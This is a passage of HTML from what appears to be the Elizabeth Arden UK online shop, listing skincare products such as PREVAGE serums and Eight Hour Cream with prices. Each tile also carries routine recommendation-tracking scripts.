  3420. cq_params.locale = window.CQuotient.locale;
  3421. cq_params.slotId = '';
  3422. cq_params.slotConfigId = '';
  3423. cq_params.slotConfigTemplate = '';
  3424. if(window.CQuotient.sendActivity)
  3425. window.CQuotient.sendActivity( CQuotient.clientId, 'viewReco', cq_params );
  3426. else
  3427. window.CQuotient.activities.push( {activityType: 'viewReco', parameters: cq_params} );
  3428. }
  3429. } catch(err) {}
  3430. })();
  3431. /* ]]> */
  3432. // -->
  3433. </script>
  3434. <script type="text/javascript">//<!--
  3435. /* <![CDATA[ (viewProduct-active_data.js) */
  3436. dw.ac._capture({id: "1001PRVN40115", type: "recommendation"});
  3437. /* ]]> */
  3438. // -->
  3439. </script>
  3440. <div class="product-tile bfx-price-product sync-done" data-itemid="1001PRVN40115" data-idx="null" data-cgid="null">
  3441. <span class="visually-hidden bfx-sku ">PRVN40115</span>
  3442. <div class="product-badge hide-mobile">
  3443. <img src="png/award-winner.png" alt="Award Winner" />
  3444. </div>
  3445. <div class="product-main-image">
  3446. <div class="product-image">
  3447. <a class="thumb-link" href="prevage-anti-aging-intensive-repair-daily-serum-1001prvn40115.html" title="PREVAGE&reg; Anti-Aging + Intensive Repair Daily Serum">
  3448. <img src="jpg/1001prvn40115b4b7.jpg?sw=550&amp;sh=550&amp;sm=fit" alt="PREVAGE&reg; Anti-Aging + Intensive Repair Daily Serum, , large" class="desktop-only" />
  3449. <img src="jpg/1001prvn40115b4b7.jpg?sw=550&amp;sh=550&amp;sm=fit" alt="PREVAGE&reg; Anti-Aging + Intensive Repair Daily Serum, , large" class="ipad-only" />
  3450. <img src="jpg/1001prvn401155a00.jpg?sw=135&amp;sh=136&amp;sm=fit" alt="PREVAGE&reg; Anti-Aging + Intensive Repair Daily Serum, , large" class="iphone-only" />
  3451. </a>
  3452. </div>
  3453. </div>
  3454. <div class="product-main-description">
  3455. <div class="product-badge hide-desktop hide-tablet">
  3456. Award Winner
  3457. </div>
  3458. <div class="product-name">
  3459. <a class="name-link" href="prevage-anti-aging-intensive-repair-daily-serum-1001prvn40115.html" title="PREVAGE&reg; Anti-Aging + Intensive Repair Daily Serum">
  3460. PREVAGE<sup>&reg;</sup> Anti-Aging + Intensive Repair Daily Serum
  3461. </a>
  3462. </div>
  3463. <div class="product-short-description">
  3464. <a class="name-link" href="prevage-anti-aging-intensive-repair-daily-serum-1001prvn40115.html">
  3465. Soothes & Protects
  3466. </a>
  3467. </div>
  3468. <span class="sku visually-hidden">PRVN40115</span>
  3469. <div class="product-pricing">
  3470. <span class="product-sales-price bfx-price bfx-list-price " title="Sale Price">&pound;190.00</span>
  3471. </div>
  3472. <div class="review">
  3473. <div data-bv-seo="false" data-bv-show="inline_rating" data-bv-productId="1001prvn40115" data-bv-redirect-url="/prevage-anti-aging-intensive-repair-daily-serum-1001PRVN40115.html"></div>
  3474. </div>
  3475. <div class="product-button hideallsearchpage">
  3476. <a class="button simple" href="prevage-anti-aging-intensive-repair-daily-serum-1001prvn40115.html" title="SHOP NOW">SHOP NOW</a>
  3477. </div>
  3478. </div>
  3479. </div>
  3480. <div class="product-button hideallpages">
  3481. <a class="button simple" href="prevage-anti-aging-intensive-repair-daily-serum-1001prvn40115.html" title="SHOP NOW">SHOP NOW</a>
  3482. </div>
  3483. </div>
  3484. </div>
  3485. <div class="product-tile product-tile-height">
  3486. <div class="grid-tile new-row protile" data-recommendername="undefined" data-itemid="1001A0115900">
  3487.  
  3488. <script type="text/javascript">//<!--
  3489. /* <![CDATA[ */
  3490. (function(){
  3491. try {
  3492. if(window.CQuotient) {
  3493. var cq_params = {};
  3494. cq_params.cookieId = window.CQuotient.getCQCookieId();
  3495. cq_params.userId = window.CQuotient.getCQUserId();
  3496. cq_params.emailId = CQuotient.getCQHashedEmail();
  3497. cq_params.loginId = CQuotient.getCQHashedLogin();
  3498. cq_params.accumulate = true;
  3499. cq_params.products = [{
  3500. id: '1001A0115900',
  3501. sku: '',
  3502. type: '',
  3503. alt_id: ''
  3504. }];
  3505. cq_params.recommenderName = '__UNDEFINED__';
  3506. cq_params.realm = "AAHP";
  3507. cq_params.siteId = "ElizabethArdenUK";
  3508. cq_params.instanceType = "prd";
  3509. cq_params.locale = window.CQuotient.locale;
  3510. cq_params.slotId = '';
  3511. cq_params.slotConfigId = '';
  3512. cq_params.slotConfigTemplate = '';
  3513. if(window.CQuotient.sendActivity)
  3514. window.CQuotient.sendActivity( CQuotient.clientId, 'viewReco', cq_params );
  3515. else
  3516. window.CQuotient.activities.push( {activityType: 'viewReco', parameters: cq_params} );
  3517. }
  3518. } catch(err) {}
  3519. })();
  3520. /* ]]> */
  3521. // -->
  3522. </script>
  3523. <script type="text/javascript">//<!--
  3524. /* <![CDATA[ (viewProduct-active_data.js) */
  3525. dw.ac._capture({id: "1001A0115900", type: "recommendation"});
  3526. /* ]]> */
  3527. // -->
  3528. </script>
  3529. <div class="product-tile  sync-done" data-itemid="1001A0115900" data-idx="null" data-cgid="null">
  3530. <span class="visually-hidden  ">A0119122</span>
  3531. <div class="product-badge hide-mobile">
  3532. <img src="png/award-winner.png" alt="Award Winner" />
  3533. </div>
  3534. <div class="product-main-image">
  3535. <div class="product-image">
  3536. <a class="thumb-link" href="retinol-ceramide-capsules-line-erasing-night-serum-1001a0115900.html" title="Retinol Ceramide Capsules Line Erasing Night Serum">
  3537. <img src="jpg/2104-retinol-ceramide-capsules-90-pieceb4b7.jpg?sw=550&amp;sh=550&amp;sm=fit" alt="Retinol Ceramide Capsules Line Erasing Night Serum, , large" class="desktop-only" />
  3538. <img src="jpg/2104-retinol-ceramide-capsules-90-pieceb4b7.jpg?sw=550&amp;sh=550&amp;sm=fit" alt="Retinol Ceramide Capsules Line Erasing Night Serum, , large" class="ipad-only" />
  3539. <img src="jpg/2104-retinol-ceramide-capsules-90-piece5a00.jpg?sw=135&amp;sh=136&amp;sm=fit" alt="Retinol Ceramide Capsules Line Erasing Night Serum, , large" class="iphone-only" />
  3540. </a>
  3541. </div>
  3542. </div>
  3543. <div class="product-main-description">
  3544. <div class="product-badge hide-desktop hide-tablet">
  3545. Award Winner
  3546. </div>
  3547. <div class="product-name">
  3548. <a class="name-link" href="retinol-ceramide-capsules-line-erasing-night-serum-1001a0115900.html" title="Retinol Ceramide Capsules Line Erasing Night Serum">
  3549. Retinol Ceramide Capsules Line Erasing Night Serum
  3550. </a>
  3551. </div>
  3552. <div class="product-short-description">
  3553. <a class="name-link" href="retinol-ceramide-capsules-line-erasing-night-serum-1001a0115900.html">
  3554. Bestselling Anti-Aging Retinol Serum
  3555. </a>
  3556. </div>
  3557. <span class="sku visually-hidden">A0119122</span>
  3558. <div class="product-pricing">
  3559. <span class="bfx-price-product">
  3560. <span class="visually-hidden bfx-sku ">A0115931</span>
  3561. <span class="null bfx-price bfx-list-price " title="Price Range">&pound;49.00</span>
  3562. </span>
  3563. -
  3564. <span class="bfx-price-product">
  3565. <span class="visually-hidden bfx-sku ">A0119122</span>
  3566. <span class="null bfx-price bfx-list-price " title="Price Range">&pound;96.00</span>
  3567. </span>
  3568. </div>
  3569. <div class="review">
  3570. <div data-bv-seo="false" data-bv-show="inline_rating" data-bv-productId="1001a0115900" data-bv-redirect-url="/retinol-ceramide-capsules-line-erasing-night-serum-1001A0115900.html"></div>
  3571. </div>
  3572. <div class="product-button hideallsearchpage">
  3573. <a class="button simple" href="retinol-ceramide-capsules-line-erasing-night-serum-1001a0115900.html" title="SHOP NOW">SHOP NOW</a>
  3574. </div>
  3575. </div>
  3576. </div>
  3577. <div class="product-button hideallpages">
  3578. <a class="button simple" href="retinol-ceramide-capsules-line-erasing-night-serum-1001a0115900.html" title="SHOP NOW">SHOP NOW</a>
  3579. </div>
  3580. </div>
  3581. </div>
  3582. <div class="product-tile product-tile-height">
  3583. <div class="grid-tile new-row protile" data-recommendername="undefined" data-itemid="1001A0119546">
  3584.  
  3585. <script type="text/javascript">//<!--
  3586. /* <![CDATA[ */
  3587. (function(){
  3588. try {
  3589. if(window.CQuotient) {
  3590. var cq_params = {};
  3591. cq_params.cookieId = window.CQuotient.getCQCookieId();
  3592. cq_params.userId = window.CQuotient.getCQUserId();
  3593. cq_params.emailId = CQuotient.getCQHashedEmail();
  3594. cq_params.loginId = CQuotient.getCQHashedLogin();
  3595. cq_params.accumulate = true;
  3596. cq_params.products = [{
  3597. id: '1001A0119546',
  3598. sku: '',
  3599. type: '',
  3600. alt_id: ''
  3601. }];
  3602. cq_params.recommenderName = '__UNDEFINED__';
  3603. cq_params.realm = "AAHP";
  3604. cq_params.siteId = "ElizabethArdenUK";
  3605. cq_params.instanceType = "prd";
  3606. cq_params.locale = window.CQuotient.locale;
  3607. cq_params.slotId = '';
  3608. cq_params.slotConfigId = '';
  3609. cq_params.slotConfigTemplate = '';
  3610. if(window.CQuotient.sendActivity)
  3611. window.CQuotient.sendActivity( CQuotient.clientId, 'viewReco', cq_params );
  3612. else
  3613. window.CQuotient.activities.push( {activityType: 'viewReco', parameters: cq_params} );
  3614. }
  3615. } catch(err) {}
  3616. })();
  3617. /* ]]> */
  3618. // -->
  3619. </script>
  3620. <script type="text/javascript">//<!--
  3621. /* <![CDATA[ (viewProduct-active_data.js) */
  3622. dw.ac._capture({id: "1001A0119546", type: "recommendation"});
  3623. /* ]]> */
  3624. // -->
  3625. </script>
  3626. <div class="product-tile  sync-done" data-itemid="1001A0119546" data-idx="null" data-cgid="null">
  3627. <span class="visually-hidden  ">A0126098</span>
  3628. <div class="product-main-image">
  3629. <div class="product-image">
  3630. <a class="thumb-link" href="vitamin-c-ceramide-capsules-radiance-renewal-serum-1001a0119546.html" title="Vitamin C Ceramide Capsules Radiance Renewal Serum">
  3631. <img src="jpg/2104-a0126098-vitamin-c-capsules-90-pieceb4b7.jpg?sw=550&amp;sh=550&amp;sm=fit" alt="Vitamin C Ceramide Capsules Radiance Renewal Serum, , large" class="desktop-only" />
  3632. <img src="jpg/2104-a0126098-vitamin-c-capsules-90-pieceb4b7.jpg?sw=550&amp;sh=550&amp;sm=fit" alt="Vitamin C Ceramide Capsules Radiance Renewal Serum, , large" class="ipad-only" />
  3633. <img src="jpg/2104-a0126098-vitamin-c-capsules-90-piece5a00.jpg?sw=135&amp;sh=136&amp;sm=fit" alt="Vitamin C Ceramide Capsules Radiance Renewal Serum, , large" class="iphone-only" />
  3634. </a>
  3635. </div>
  3636. </div>
  3637. <div class="product-main-description">
  3638. <div class="product-name">
  3639. <a class="name-link" href="vitamin-c-ceramide-capsules-radiance-renewal-serum-1001a0119546.html" title="Vitamin C Ceramide Capsules Radiance Renewal Serum">
  3640. Vitamin C Ceramide Capsules Radiance Renewal Serum
  3641. </a>
  3642. </div>
  3643. <div class="product-short-description">
  3644. <a class="name-link" href="vitamin-c-ceramide-capsules-radiance-renewal-serum-1001a0119546.html">
  3645. Brightens Skin & Improves Radiance
  3646. </a>
  3647. </div>
  3648. <span class="sku visually-hidden">A0126098</span>
  3649. <div class="product-pricing">
  3650. <span class="bfx-price-product">
  3651. <span class="visually-hidden bfx-sku ">A0119546</span>
  3652. <span class="null bfx-price bfx-list-price " title="Price Range">&pound;49.00</span>
  3653. </span>
  3654. -
  3655. <span class="bfx-price-product">
  3656. <span class="visually-hidden bfx-sku ">A0126098</span>
  3657. <span class="null bfx-price bfx-list-price " title="Price Range">&pound;96.00</span>
  3658. </span>
  3659. </div>
  3660. <div class="review">
  3661. <div data-bv-seo="false" data-bv-show="inline_rating" data-bv-productId="1001a0119546" data-bv-redirect-url="/vitamin-c-ceramide-capsules-radiance-renewal-serum-1001A0119546.html"></div>
  3662. </div>
  3663. <div class="product-button hideallsearchpage">
  3664. <a class="button simple" href="vitamin-c-ceramide-capsules-radiance-renewal-serum-1001a0119546.html" title="SHOP NOW">SHOP NOW</a>
  3665. </div>
  3666. </div>
  3667. </div>
  3668. <div class="product-button hideallpages">
  3669. <a class="button simple" href="vitamin-c-ceramide-capsules-radiance-renewal-serum-1001a0119546.html" title="SHOP NOW">SHOP NOW</a>
  3670. </div>
  3671. </div>
  3672. </div>
  3673. <div class="product-tile product-tile-height">
  3674. <div class="grid-tile new-row protile" data-recommendername="undefined" data-itemid="EIGN10090">
  3675.  
  3676. <script type="text/javascript">//<!--
  3677. /* <![CDATA[ */
  3678. (function(){
  3679. try {
  3680. if(window.CQuotient) {
  3681. var cq_params = {};
  3682. cq_params.cookieId = window.CQuotient.getCQCookieId();
  3683. cq_params.userId = window.CQuotient.getCQUserId();
  3684. cq_params.emailId = CQuotient.getCQHashedEmail();
  3685. cq_params.loginId = CQuotient.getCQHashedLogin();
  3686. cq_params.accumulate = true;
  3687. cq_params.products = [{
  3688. id: 'UK10014252000',
  3689. sku: 'EIGN10090',
  3690. type: '',
  3691. alt_id: ''
  3692. }];
  3693. cq_params.recommenderName = '__UNDEFINED__';
  3694. cq_params.realm = "AAHP";
  3695. cq_params.siteId = "ElizabethArdenUK";
  3696. cq_params.instanceType = "prd";
  3697. cq_params.locale = window.CQuotient.locale;
  3698. cq_params.slotId = '';
  3699. cq_params.slotConfigId = '';
  3700. cq_params.slotConfigTemplate = '';
  3701. if(window.CQuotient.sendActivity)
  3702. window.CQuotient.sendActivity( CQuotient.clientId, 'viewReco', cq_params );
  3703. else
  3704. window.CQuotient.activities.push( {activityType: 'viewReco', parameters: cq_params} );
  3705. }
  3706. } catch(err) {}
  3707. })();
  3708. /* ]]> */
  3709. // -->
  3710. </script>
  3711. <script type="text/javascript">//<!--
  3712. /* <![CDATA[ (viewProduct-active_data.js) */
  3713. dw.ac._capture({id: "EIGN10090", type: "recommendation"});
  3714. /* ]]> */
  3715. // -->
  3716. </script>
  3717. <div class="product-tile bfx-price-product sync-done" data-itemid="EIGN10090" data-idx="null" data-cgid="null">
  3718. <span class="visually-hidden bfx-sku ">EIGN10090</span>
  3719. <div class="product-badge hide-mobile">
  3720. <img src="png/award-winner.png" alt="Award Winner" />
  3721. </div>
  3722. <div class="product-main-image">
  3723. <div class="product-image">
  3724. <a class="thumb-link" href="eight-hour-cream-skin-protectant-eign10090.html" title="Eight Hour&reg; Cream Skin Protectant">
  3725. <img src="jpg/eighthr_original_2104_newb4b7.jpg?sw=550&amp;sh=550&amp;sm=fit" alt="Eight Hour&reg; Cream Skin Protectant, , large" class="desktop-only" />
  3726. <img src="jpg/eighthr_original_2104_newb4b7.jpg?sw=550&amp;sh=550&amp;sm=fit" alt="Eight Hour&reg; Cream Skin Protectant, , large" class="ipad-only" />
  3727. <img src="jpg/eighthr_original_2104_new5a00.jpg?sw=135&amp;sh=136&amp;sm=fit" alt="Eight Hour&reg; Cream Skin Protectant, , large" class="iphone-only" />
  3728. </a>
  3729. </div>
  3730. </div>
  3731. <div class="product-main-description">
  3732. <div class="product-badge hide-desktop hide-tablet">
  3733. Award Winner
  3734. </div>
  3735. <div class="product-name">
  3736. <a class="name-link" href="eight-hour-cream-skin-protectant-eign10090.html" title="Eight Hour&reg; Cream Skin Protectant">
  3737. Eight Hour<sup>&reg;</sup> Cream Skin Protectant
  3738. </a>
  3739. </div>
  3740. <div class="product-short-description">
  3741. <a class="name-link" href="eight-hour-cream-skin-protectant-eign10090.html">
  3742. Calms, Protects & Hydrates
  3743. </a>
  3744. </div>
  3745. <span class="sku visually-hidden">EIGN10090</span>
  3746. <div class="product-pricing">
  3747. <span class="product-standard-price bfx-price bfx-list-price " title="Standard Price">&pound;29.00</span>
  3748. <span class="product-sales-price bfx-price bfx-list-price " title="Sale Price">&pound;23.20</span>
  3749. </div>
  3750. <div class="review">
  3751. <div data-bv-seo="false" data-bv-show="inline_rating" data-bv-productId="eign10090" data-bv-redirect-url="/eight-hour-cream-skin-protectant-EIGN10090.html"></div>
  3752. </div>
  3753. <div class="product-button hideallsearchpage">
  3754. <a class="button simple" href="eight-hour-cream-skin-protectant-eign10090.html" title="SHOP NOW">SHOP NOW</a>
  3755. </div>
  3756. </div>
  3757. </div>
  3758. <div class="product-button hideallpages">
  3759. <a class="button simple" href="eight-hour-cream-skin-protectant-eign10090.html" title="SHOP NOW">SHOP NOW</a>
  3760. </div>
  3761. </div>
  3762. </div>
  3763. <div class="product-tile product-tile-height">
  3764. <div class="grid-tile new-row protile" data-recommendername="undefined" data-itemid="1001STAN40001">
  3765.  
  3766. <script type="text/javascript">//<!--
  3767. /* <![CDATA[ */
  3768. (function(){
  3769. try {
  3770. if(window.CQuotient) {
  3771. var cq_params = {};
  3772. cq_params.cookieId = window.CQuotient.getCQCookieId();
  3773. cq_params.userId = window.CQuotient.getCQUserId();
  3774. cq_params.emailId = CQuotient.getCQHashedEmail();
  3775. cq_params.loginId = CQuotient.getCQHashedLogin();
  3776. cq_params.accumulate = true;
  3777. cq_params.products = [{
  3778. id: '1001STAN40001',
  3779. sku: '',
  3780. type: '',
  3781. alt_id: ''
  3782. }];
  3783. cq_params.recommenderName = '__UNDEFINED__';
  3784. cq_params.realm = "AAHP";
  3785. cq_params.siteId = "ElizabethArdenUK";
  3786. cq_params.instanceType = "prd";
  3787. cq_params.locale = window.CQuotient.locale;
  3788. cq_params.slotId = '';
  3789. cq_params.slotConfigId = '';
  3790. cq_params.slotConfigTemplate = '';
  3791. if(window.CQuotient.sendActivity)
  3792. window.CQuotient.sendActivity( CQuotient.clientId, 'viewReco', cq_params );
  3793. else
  3794. window.CQuotient.activities.push( {activityType: 'viewReco', parameters: cq_params} );
  3795. }
  3796. } catch(err) {}
  3797. })();
  3798. /* ]]> */
  3799. // -->
  3800. </script>
  3801. <script type="text/javascript">//<!--
  3802. /* <![CDATA[ (viewProduct-active_data.js) */
  3803. dw.ac._capture({id: "1001STAN40001", type: "recommendation"});
  3804. /* ]]> */
  3805. // -->
  3806. </script>
  3807. <div class="product-tile  sync-done" data-itemid="1001STAN40001" data-idx="null" data-cgid="null">
  3808. <span class="visually-hidden  ">STAN40001</span>
  3809. <div class="product-badge hide-mobile">
  3810. <img src="png/award-winner.png" alt="Award Winner" />
  3811. </div>
  3812. <div class="product-main-image">
  3813. <div class="product-image">
  3814. <a class="thumb-link" href="elizabeth-arden-superstart-skin-renewal-booster-1001stan40001.html" title="Elizabeth Arden SUPERSTART Skin Renewal Booster">
  3815. <img src="jpg/1001stan40001b4b7.jpg?sw=550&amp;sh=550&amp;sm=fit" alt="Elizabeth Arden SUPERSTART Skin Renewal Booster, , large" class="desktop-only" />
  3816. <img src="jpg/1001stan40001b4b7.jpg?sw=550&amp;sh=550&amp;sm=fit" alt="Elizabeth Arden SUPERSTART Skin Renewal Booster, , large" class="ipad-only" />
  3817. <img src="jpg/1001stan400015a00.jpg?sw=135&amp;sh=136&amp;sm=fit" alt="Elizabeth Arden SUPERSTART Skin Renewal Booster, , large" class="iphone-only" />
  3818. </a>
  3819. </div>
  3820. </div>
  3821. <div class="product-main-description">
  3822. <div class="product-badge hide-desktop hide-tablet">
  3823. Award Winner
  3824. </div>
  3825. <div class="product-name">
  3826. <a class="name-link" href="elizabeth-arden-superstart-skin-renewal-booster-1001stan40001.html" title="Elizabeth Arden SUPERSTART Skin Renewal Booster">
  3827. Elizabeth Arden SUPERSTART Skin Renewal Booster
  3828. </a>
  3829. </div>
  3830. <div class="product-short-description">
  3831. <a class="name-link" href="elizabeth-arden-superstart-skin-renewal-booster-1001stan40001.html">
  3832. Prebiotic: Boosts Every Skincare Routine
  3833. </a>
  3834. </div>
  3835. <span class="sku visually-hidden">STAN40001</span>
  3836. <div class="product-pricing">
  3837. <span class="bfx-price-product">
  3838. <span class="visually-hidden bfx-sku ">STAN40001</span>
  3839. <span class="null bfx-price bfx-list-price " title="Price Range">&pound;48.00</span>
  3840. </span>
  3841. -
  3842. <span class="bfx-price-product">
  3843. <span class="visually-hidden bfx-sku ">A0101366</span>
  3844. <span class="null bfx-price bfx-list-price " title="Price Range">&pound;63.00</span>
  3845. </span>
  3846. </div>
  3847. <div class="review">
  3848. <div data-bv-seo="false" data-bv-show="inline_rating" data-bv-productId="1001stan40001" data-bv-redirect-url="/elizabeth-arden-superstart-skin-renewal-booster-1001STAN40001.html"></div>
  3849. </div>
  3850. <div class="product-button hideallsearchpage">
  3851. <a class="button simple" href="elizabeth-arden-superstart-skin-renewal-booster-1001stan40001.html" title="SHOP NOW">SHOP NOW</a>
  3852. </div>
  3853. </div>
  3854. </div>
  3855. <div class="product-button hideallpages">
  3856. <a class="button simple" href="elizabeth-arden-superstart-skin-renewal-booster-1001stan40001.html" title="SHOP NOW">SHOP NOW</a>
  3857. </div>
  3858. </div>
  3859. </div>
  3860. <div class="product-tile product-tile-height">
  3861. <div class="grid-tile new-row protile" data-recommendername="undefined" data-itemid="1001A0100502">
  3862.  
  3863. <script type="text/javascript">//<!--
  3864. /* <![CDATA[ */
  3865. (function(){
  3866. try {
  3867. if(window.CQuotient) {
  3868. var cq_params = {};
  3869. cq_params.cookieId = window.CQuotient.getCQCookieId();
  3870. cq_params.userId = window.CQuotient.getCQUserId();
  3871. cq_params.emailId = CQuotient.getCQHashedEmail();
  3872. cq_params.loginId = CQuotient.getCQHashedLogin();
  3873. cq_params.accumulate = true;
  3874. cq_params.products = [{
  3875. id: '1001A0100502',
  3876. sku: '',
  3877. type: '',
  3878. alt_id: ''
  3879. }];
  3880. cq_params.recommenderName = '__UNDEFINED__';
  3881. cq_params.realm = "AAHP";
  3882. cq_params.siteId = "ElizabethArdenUK";
  3883. cq_params.instanceType = "prd";
  3884. cq_params.locale = window.CQuotient.locale;
  3885. cq_params.slotId = '';
  3886. cq_params.slotConfigId = '';
  3887. cq_params.slotConfigTemplate = '';
  3888. if(window.CQuotient.sendActivity)
  3889. window.CQuotient.sendActivity( CQuotient.clientId, 'viewReco', cq_params );
  3890. else
  3891. window.CQuotient.activities.push( {activityType: 'viewReco', parameters: cq_params} );
  3892. }
  3893. } catch(err) {}
  3894. })();
  3895. /* ]]> */
  3896. // -->
  3897. </script>
  3898. <script type="text/javascript">//<!--
  3899. /* <![CDATA[ (viewProduct-active_data.js) */
  3900. dw.ac._capture({id: "1001A0100502", type: "recommendation"});
  3901. /* ]]> */
  3902. // -->
  3903. </script>
  3904. <div class="product-tile bfx-price-product sync-done" data-itemid="1001A0100502" data-idx="null" data-cgid="null">
  3905. <span class="visually-hidden bfx-sku ">A0100502</span>
  3906. <div class="product-main-image">
  3907. <div class="product-image">
  3908. <a class="thumb-link" href="prevage-city-smart-spf-50-1001a0100502.html" title="PREVAGE&reg; City Smart SPF 50">
  3909. <img src="jpg/1001a0100498b4b7.jpg?sw=550&amp;sh=550&amp;sm=fit" alt="PREVAGE&reg; City Smart SPF 50, , large" class="desktop-only" />
  3910. <img src="jpg/1001a0100498b4b7.jpg?sw=550&amp;sh=550&amp;sm=fit" alt="PREVAGE&reg; City Smart SPF 50, , large" class="ipad-only" />
  3911. <img src="jpg/1001a01004985a00.jpg?sw=135&amp;sh=136&amp;sm=fit" alt="PREVAGE&reg; City Smart SPF 50, , large" class="iphone-only" />
  3912. </a>
  3913. </div>
  3914. </div>
  3915. <div class="product-main-description">
  3916. <div class="product-name">
  3917. <a class="name-link" href="prevage-city-smart-spf-50-1001a0100502.html" title="PREVAGE&reg; City Smart SPF 50">
  3918. PREVAGE<sup>&reg;</sup> City Smart SPF 50
  3919. </a>
  3920. </div>
  3921. <div class="product-short-description">
  3922. <a class="name-link" href="prevage-city-smart-spf-50-1001a0100502.html">
  3923. Anti-Pollution Daily SPF
  3924. </a>
  3925. </div>
  3926. <span class="sku visually-hidden">A0100502</span>
  3927. <div class="product-pricing">
  3928. <span class="product-sales-price bfx-price bfx-list-price " title="Sale Price">&pound;58.00</span>
  3929. </div>
  3930. <div class="review">
  3931. <div data-bv-seo="false" data-bv-show="inline_rating" data-bv-productId="1001a0100502" data-bv-redirect-url="/prevage-city-smart-spf-50-1001A0100502.html"></div>
  3932. </div>
  3933. <div class="product-button hideallsearchpage">
  3934. <a class="button simple" href="prevage-city-smart-spf-50-1001a0100502.html" title="SHOP NOW">SHOP NOW</a>
  3935. </div>
  3936. </div>
  3937. </div>
  3938. <div class="product-button hideallpages">
  3939. <a class="button simple" href="prevage-city-smart-spf-50-1001a0100502.html" title="SHOP NOW">SHOP NOW</a>
  3940. </div>
  3941. </div>
  3942. </div>
  3943. <div class="product-tile product-tile-height">
  3944. <div class="grid-tile new-row protile" data-recommendername="undefined" data-itemid="1001A0104500">
  3945.  
  3946. <script type="text/javascript">//<!--
  3947. /* <![CDATA[ */
  3948. (function(){
  3949. try {
  3950. if(window.CQuotient) {
  3951. var cq_params = {};
  3952. cq_params.cookieId = window.CQuotient.getCQCookieId();
  3953. cq_params.userId = window.CQuotient.getCQUserId();
  3954. cq_params.emailId = CQuotient.getCQHashedEmail();
  3955. cq_params.loginId = CQuotient.getCQHashedLogin();
  3956. cq_params.accumulate = true;
  3957. cq_params.products = [{
  3958. id: '1001A0104500',
  3959. sku: '',
  3960. type: '',
  3961. alt_id: ''
  3962. }];
  3963. cq_params.recommenderName = '__UNDEFINED__';
  3964. cq_params.realm = "AAHP";
  3965. cq_params.siteId = "ElizabethArdenUK";
  3966. cq_params.instanceType = "prd";
  3967. cq_params.locale = window.CQuotient.locale;
  3968. cq_params.slotId = '';
  3969. cq_params.slotConfigId = '';
  3970. cq_params.slotConfigTemplate = '';
  3971. if(window.CQuotient.sendActivity)
  3972. window.CQuotient.sendActivity( CQuotient.clientId, 'viewReco', cq_params );
  3973. else
  3974. window.CQuotient.activities.push( {activityType: 'viewReco', parameters: cq_params} );
  3975. }
  3976. } catch(err) {}
  3977. })();
  3978. /* ]]> */
  3979. // -->
  3980. </script>
  3981. <script type="text/javascript">//<!--
  3982. /* <![CDATA[ (viewProduct-active_data.js) */
  3983. dw.ac._capture({id: "1001A0104500", type: "recommendation"});
  3984. /* ]]> */
  3985. // -->
  3986. </script>
  3987. <div class="product-tile  sync-done" data-itemid="1001A0104500" data-idx="null" data-cgid="null">
  3988. <span class="visually-hidden  ">A0123877</span>
  3989. <div class="product-main-image">
  3990. <div class="product-image">
  3991. <a class="thumb-link" href="advanced-ceramide-capsules-daily-youth-restoring-serum-1001a0104500.html" title="Advanced Ceramide Capsules Daily Youth Restoring Serum">
  3992. <img src="jpg/1001a0106700b4b7.jpg?sw=550&amp;sh=550&amp;sm=fit" alt="Advanced Ceramide Capsules Daily Youth Restoring Serum, , large" class="desktop-only" />
  3993. <img src="jpg/1001a0106700b4b7.jpg?sw=550&amp;sh=550&amp;sm=fit" alt="Advanced Ceramide Capsules Daily Youth Restoring Serum, , large" class="ipad-only" />
  3994. <img src="jpg/1001a01067005a00.jpg?sw=135&amp;sh=136&amp;sm=fit" alt="Advanced Ceramide Capsules Daily Youth Restoring Serum, , large" class="iphone-only" />
  3995. </a>
  3996. </div>
  3997. </div>
  3998. <div class="product-main-description">
  3999. <div class="product-name">
  4000. <a class="name-link" href="advanced-ceramide-capsules-daily-youth-restoring-serum-1001a0104500.html" title="Advanced Ceramide Capsules Daily Youth Restoring Serum">
  4001. Advanced Ceramide Capsules Daily Youth Restoring Serum
  4002. </a>
  4003. </div>
  4004. <div class="product-short-description">
  4005. <a class="name-link" href="advanced-ceramide-capsules-daily-youth-restoring-serum-1001a0104500.html">
  4006. Bestselling Youth Restoring Ceramide Serum
  4007. </a>
  4008. </div>
  4009. <span class="sku visually-hidden">A0123877</span>
  4010. <div class="product-pricing">
  4011. <span class="bfx-price-product">
  4012. <span class="visually-hidden bfx-sku ">A0104591</span>
  4013. <span class="null bfx-price bfx-list-price " title="Price Range">&pound;48.00</span>
  4014. </span>
  4015. -
  4016. <span class="bfx-price-product">
  4017. <span class="visually-hidden bfx-sku ">A0104589</span>
  4018. <span class="null bfx-price bfx-list-price " title="Price Range">&pound;93.00</span>
  4019. </span>
  4020. </div>
  4021. <div class="review">
  4022. <div data-bv-seo="false" data-bv-show="inline_rating" data-bv-productId="1001a0104500" data-bv-redirect-url="/advanced-ceramide-capsules-daily-youth-restoring-serum-1001A0104500.html"></div>
  4023. </div>
  4024. <div class="product-button hideallsearchpage">
  4025. <a class="button simple" href="advanced-ceramide-capsules-daily-youth-restoring-serum-1001a0104500.html" title="SHOP NOW">SHOP NOW</a>
  4026. </div>
  4027. </div>
  4028. </div>
  4029. <div class="product-button hideallpages">
  4030. <a class="button simple" href="advanced-ceramide-capsules-daily-youth-restoring-serum-1001a0104500.html" title="SHOP NOW">SHOP NOW</a>
  4031. </div>
  4032. </div>
  4033. </div>
  4034. <div class="product-tile product-tile-height">
  4035. <div class="grid-tile new-row protile" data-recommendername="undefined" data-itemid="UK1001070400">
  4036.  
  4037. <script type="text/javascript">//<!--
  4038. /* <![CDATA[ */
  4039. (function(){
  4040. try {
  4041. if(window.CQuotient) {
  4042. var cq_params = {};
  4043. cq_params.cookieId = window.CQuotient.getCQCookieId();
  4044. cq_params.userId = window.CQuotient.getCQUserId();
  4045. cq_params.emailId = CQuotient.getCQHashedEmail();
  4046. cq_params.loginId = CQuotient.getCQHashedLogin();
  4047. cq_params.accumulate = true;
  4048. cq_params.products = [{
  4049. id: 'UK1001070400',
  4050. sku: '',
  4051. type: '',
  4052. alt_id: ''
  4053. }];
  4054. cq_params.recommenderName = '__UNDEFINED__';
  4055. cq_params.realm = "AAHP";
  4056. cq_params.siteId = "ElizabethArdenUK";
  4057. cq_params.instanceType = "prd";
  4058. cq_params.locale = window.CQuotient.locale;
  4059. cq_params.slotId = '';
  4060. cq_params.slotConfigId = '';
  4061. cq_params.slotConfigTemplate = '';
  4062. if(window.CQuotient.sendActivity)
  4063. window.CQuotient.sendActivity( CQuotient.clientId, 'viewReco', cq_params );
  4064. else
  4065. window.CQuotient.activities.push( {activityType: 'viewReco', parameters: cq_params} );
  4066. }
  4067. } catch(err) {}
  4068. })();
  4069. /* ]]> */
